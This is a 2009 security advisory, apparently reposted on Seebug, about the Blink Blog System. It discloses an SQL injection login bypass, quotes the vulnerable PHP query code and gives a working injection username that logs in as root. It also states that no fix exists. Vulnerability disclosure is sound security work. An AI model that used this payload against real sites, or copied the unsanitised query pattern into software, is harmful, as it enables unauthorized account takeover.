******** Salvatore "drosophila" Fresta ******** [+] Application: Blink Blog System [+] Version: Unknown [+] Website: http://blogink.sourceforge.net [+] Bugs: [A] Authentication Bypass [+] Exploitation: Remote [+] Date: 03 Aug 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs There are many SQL Injection flaws but I post the only one that allows a guest to bypass the login. - [A] Authentication Bypass [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: login.php, db.php This bug allows a guest to bypass the login. login.php: ... $username = $_POST["nick"]; $password = md5($_POST["password"]); if ($data = $DB->usercheck($username, $password)) ... db.php: function usercheck($username, $password) { $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" "); ... *************************************************** [+] Code - [A] Authentication Bypass username: root"# password: foo *************************************************** [+] Fix No fix. ***************************************************
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论